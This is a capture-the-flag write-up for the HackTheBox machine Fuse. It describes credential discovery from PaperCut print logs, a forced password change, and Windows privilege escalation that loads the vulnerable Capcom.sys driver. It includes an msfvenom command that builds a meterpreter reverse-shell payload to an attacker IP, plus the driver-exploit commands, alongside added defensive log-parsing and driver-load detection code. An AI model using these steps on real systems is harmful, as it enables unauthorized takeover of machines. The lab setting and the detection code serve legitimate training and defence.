Fuse — HackTheBox

y4th0ts
6 min read · Oct 31, 2020

Summary

Fuse is a medium-rated Windows machine created by egre55. Initial foothold is gained by discovering a password that has expired and can be changed in order to get access to SMB shares and rpcclient. A user shell is obtained by enumerating the printer through rpcclient and determining a password used by one of the users. Administrative privileges are obtained by abusing SeLoadDriverPrivilege.

Reconnaissance

Nmap scan results show the ports commonly seen alongside LDAP, such as 445 and 139 (SMB), 135 (RPC) and 88 (Kerberos), plus an HTTP service on port 80.

nmap -sVC -Pn -oN fuse.initial fuse.htb

Visiting the HTTP port redirected me to http://fuse.fabricorp.local/papercut/logs/csv, which was unreachable.

I added it to my hosts file in order to be able to browse the page.

Now we can see a print logger page with some links that can be useful to us.

I downloaded the CSV files to look for any useful information.

The files contain the same information that can be found on the PaperCut page. It seems like we have possible users that we can use.

I did some string manipulation and directed the output to a file to clean up a little more.

Finally, we have our users.
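The string manipulation above was done by hand; as an added example (not the author's commands), the following script parses a constructed sample in the shape of a PaperCut print-log CSV and pulls out the two things this write-up ends up using, the unique account names and the bare document names. Column names approximate the real export, and all rows are invented apart from the user names and the Fabricorp01.docx entry mentioned in the text.

```python
import csv
import io
from pathlib import PureWindowsPath

# Constructed sample shaped like a PaperCut print-logger CSV export.
# Columns approximate the real format; printer, client and most document
# names are placeholders, user names and Fabricorp01.docx come from the write-up.
SAMPLE_CSV = """Time,User,Pages,Copies,Printer,Document Name,Client,Paper Size,Language,Height,Width,Duplex,Grayscale,Size
2020/05/28 16:27:43,bhult,1,1,PRINTER01,Fabricorp01.docx,WORKSTATION01,LETTER,PCL6,279,216,NOT DUPLEX,GRAYSCALE,1kb
2020/05/28 18:40:17,tlavel,1,1,PRINTER01,quarterly_report.xlsx,WORKSTATION02,LETTER,PCL6,279,216,DUPLEX,GRAYSCALE,23kb
2020/05/29 09:02:11,bhult,2,1,PRINTER01,C:\\Docs\\meeting_notes.docx,WORKSTATION01,LETTER,PCL6,279,216,NOT DUPLEX,GRAYSCALE,5kb
"""


def parse_print_log(csv_text):
    """Return the CSV rows as dicts keyed by the header names."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def extract_users(rows):
    """Unique, sorted account names from the User column (blank cells skipped)."""
    return sorted({r["User"].strip() for r in rows if r.get("User", "").strip()})


def document_stems(rows):
    """Unique document names with any directory and extension stripped.

    These are worth reviewing because a name such as Fabricorp01.docx is
    exactly the kind of value a simple wordlist built from page text misses.
    """
    stems = set()
    for r in rows:
        name = r.get("Document Name", "").strip()
        if name:
            stems.add(PureWindowsPath(name).stem)
    return sorted(stems)


if __name__ == "__main__":
    rows = parse_print_log(SAMPLE_CSV)
    print("users:", extract_users(rows))
    print("documents:", document_stems(rows))
```

Run against a real export, the same two lists show an administrator which account names and document titles an unauthenticated print log is exposing.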

Initial Foothold

I tried various techniques in order to find a password that I could use for the users that I found, such as GetNPUsers from impacket, and also tried logging in to SMB and rpcclient without a password, but I was not able to get any more information. My last resort was to create a wordlist by using cewl on the webpage. But unfortunately, I did not find any match. After a few hours, while looking at the CSV files, I noticed the file Fabricorp01.docx. I checked the password file that I created using cewl, and Fabricorp01 was not in the list.

I tried using this password and successfully found a match.

Users tlavel and bhult are both hits for the password ‘Fabricorp01’.

Upon authenticating to smbclient and rpcclient, I get an error that says the password must change. After a few Google searches, I found a way to change the password.

Using smbpasswd, I changed the password for tlavel and used it to login to rpcclient and smbclient.

I was only able to gain access to the print$ and SYSVOL shares.

The print$ share only has files and drivers for the printer. I tried looking through all the possible files that might contain a password or new information that could be of any use, but I did not find any.

Gaining User Access

Enumerating with rpcclient gave me new users, which I added to my current list.

By querying each user, I found out that only svc-print has logged on, by looking at the logon_count of each user. So it is highly possible that this is the account we need to get a shell as.

For some reason, enumerating the printer with ‘fuse.htb’ as the host gives me an error, but when I tried using the actual IP instead, I was able to enumerate it and find a password.

I tried logging in with evil-winrm; the login succeeded and I grabbed the user flag.

Privilege Escalation

This is pretty straightforward but requires several steps to exploit. Checking the privileges of our current user gives us the key to escalating privileges: we can see that SeLoadDriverPrivilege is enabled.

After a few minutes of research, I was able to find something that I could try out, and it ended up working in the end. The article on abusing this privilege can be found here.
Basically, we will need 4 files in order to gain administrative privileges.
- Capcom.sys
- LoadDriver.exe
- ExploitCapcom.exe
- shell.exe (meterpreter payload)

The main job of the exploit is to load Capcom.sys through a registry entry and start a service that we can exploit.

First, I compiled the ExploitCapcom code using Visual Studio. I changed one value in the code on line 292. Originally, the path is
‘C:\\Windows\\system32\\cmd.exe’. I changed it to where I will be putting my meterpreter payload, so the exploit executes that instead.

Visual Studio builds the project in Debug mode by default. For the driver loader to work, the configuration needs to be changed to ‘Release’ before building.

For the driver loader, I created a new project since the GitHub repo only has the C++ code in it. No changes are necessary to the driver loader. Just compile the project as is and it will be good to go.

I transferred the compiled executables to my Kali machine, created my meterpreter payload and downloaded the Capcom.sys file.

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.230 LPORT=9000 -b "\x00" -e x86/shikata_ga_nai -f exe -o shell.exe

Now it is time to transfer all the files to the target machine and start the exploitation. I transferred the files using the upload feature in evil-winrm.

I started a Metasploit multi/handler in order to be prepared to catch the shell after exploitation.

After running the required commands, a session started in my Meterpreter handler.
a) ./loaddriver.exe System\CurrentControlSet\TestService C:\Users\svc-print\AppData\Local\Temp\Capcom.sys
b) ./ExploitCapcom.exe
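From the defender's side, the step above leaves a kernel driver load from a user's Temp directory, which Sysmon Event ID 6 (Driver loaded) records with the image path and signature status. As an added example (not from the write-up or the tools it uses), the check below runs over constructed Sysmon 6 records and flags loads that come from a user-writable path, carry a known-abused driver name, or fail signature validation. The signer string and the non-Capcom paths are placeholders; the Capcom.sys location is the one used on this box.

```python
import re

# Known-abused driver file names. Only Capcom.sys appears in this write-up;
# extend the set from a curated vulnerable-driver list in practice.
KNOWN_ABUSED_DRIVERS = {"capcom.sys"}

# Locations a non-admin user can normally write to (drive letter, Users\, ProgramData\).
USER_WRITABLE = re.compile(r"^[a-z]:\\(users|programdata)\\", re.IGNORECASE)

# Constructed Sysmon Event ID 6 records reduced to the fields this check uses.
# Signer names and the tcpip.sys / Downloads paths are invented placeholders.
SAMPLE_EVENTS = [
    {"ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys",
     "Signed": "true", "Signature": "EXAMPLE-OS-VENDOR", "SignatureStatus": "Valid"},
    {"ImageLoaded": r"C:\Users\svc-print\AppData\Local\Temp\Capcom.sys",
     "Signed": "true", "Signature": "EXAMPLE-GAME-VENDOR", "SignatureStatus": "Valid"},
    {"ImageLoaded": r"C:\Users\jdoe\Downloads\driver.sys",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
]


def classify_driver_load(event):
    """Return the list of reasons a driver-load record looks suspicious (empty if none)."""
    reasons = []
    path = event.get("ImageLoaded", "")
    file_name = path.rsplit("\\", 1)[-1].lower()
    if file_name in KNOWN_ABUSED_DRIVERS:
        reasons.append("known abused driver name")
    if USER_WRITABLE.search(path):
        reasons.append("loaded from user-writable location")
    if event.get("SignatureStatus", "").lower() != "valid":
        reasons.append("signature not valid")
    return reasons


def suspicious_driver_loads(events):
    """Pair every flagged record's image path with the reasons it was flagged."""
    hits = []
    for event in events:
        reasons = classify_driver_load(event)
        if reasons:
            hits.append((event["ImageLoaded"], reasons))
    return hits


if __name__ == "__main__":
    for path, reasons in suspicious_driver_loads(SAMPLE_EVENTS):
        print(path, "->", ", ".join(reasons))
```

A validly signed driver is not a clean bill of health: Capcom.sys passes signature checks and is abused precisely because of that, so the path and name checks matter as much as the signature one.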

We can drop a shell or stay in meterpreter to grab the root flag.

That is it for Fuse! Thank you for reading and have a good day!
